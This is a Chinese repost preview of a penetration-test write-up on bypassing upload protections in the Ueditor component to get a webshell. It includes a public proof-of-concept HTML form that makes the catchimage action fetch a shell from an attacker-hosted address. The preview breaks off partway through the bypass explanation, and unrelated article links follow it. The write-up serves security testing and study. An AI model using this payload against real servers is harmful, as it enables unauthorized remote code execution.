记一次Ueditor上传Bypss

白帽子左一 · 公众号 · · 2024-07-30 12:00

文章预览

扫码领资料获网安教程本文作者：ddwGeGe 文章来源: https: //xz.aliyun.com/t/14686 前言前一段时间和小伙伴在某内网进行渗透测试，目标不给加白，只能进行硬刚了，队友fscan一把梭发现某资产疑似存在Ueditor组件，但初步测试是存在waf和杀软的，无法进行getshell，经过一番折腾最终getshell，文笔粗劣，大佬勿喷。测试看这返回内容，Ueditor实锤了，采用公开的POC进行尝试，由于是纯内网无法进行出网，直接本机电脑开启Web服务，充当VPS提供Shell地址 http://xx.xx.xx.xx/Scripts/Ueditor/net/controller.ashx < form action = "http://xxx.xx.xx.xx/Scripts/Ueditor/net/controller.ashx? action=catchimage" enctype = "application/x-www-form-urlencoded" method = "POST" > < p > shell addr: < input type = "text" name = "source[]" /> p > < input type = "submit" value = "Submit" /> form > 从访问日志可以看出是 ?.a?s?p?x 后缀，因为直接 ………………………………

原文地址：访问原文地址
快照地址：访问文章快照
总结与预览地址：访问总结与预览

分享到微博

推荐文章

河北交通广播 · 【992 | 刚刚】西藏林芝突发地震！

昨天

河北交通广播 · 注意！AI预测彩票号码，100%是骗局

2 天前

河北音乐广播 · 【1024·天气】周末宜出行！去欣赏初春的美好吧~

3 天前

河北交通广播 · 今晚起，请调整一下睡眠→

3 天前

河北交通广播 · 【992 | 妙招】过敏季到来！一个穴位，有利于防止鼻炎复发！转发收藏→

4 天前

北京徒步者 · 【中级】【国庆五天】【长穿毕】10月02日-06日国庆长坪沟穿越毕棚沟45公里轻装徒步

6 月前

奶爸投研干货基地 · 9/10 小盘宽基接近目标

6 月前

奶爸投研干货基地 · 9/10 小盘宽基接近目标

6 月前

科研大匠 · 官宣：36人获国家杰青、优青！附 | 最新杰青、优青，杰青延续项目汇总名单

6 月前